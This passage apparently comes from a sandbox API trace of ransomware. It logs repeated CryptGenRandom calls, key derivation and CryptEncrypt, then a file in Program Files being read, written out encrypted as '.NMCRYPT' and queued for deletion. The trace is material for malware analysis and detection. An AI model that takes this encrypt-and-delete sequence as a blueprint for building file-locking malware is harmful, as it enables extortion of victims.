hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.803] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.804] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.805] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.805] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.806] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0147.806] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.806] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad738) returned 1 [0147.806] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.806] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.806] wcslen (_String="\\\\?\\") returned 0x4 [0147.806] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0147.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.807] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2542) returned 1 [0147.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.808] GetLastError () returned 0x0 [0147.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.809] GetLastError () returned 0x0 [0147.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.809] GetLastError () returned 0x0 [0147.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xee, lpOverlapped=0x0) returned 1 [0147.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xee, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0147.810] GetLastError () returned 0x0 [0147.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0x20 [0147.811] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", dwFileAttributes=0x20) returned 0 [0147.811] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 1 [0147.811] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0 [0147.811] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" [0147.811] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft 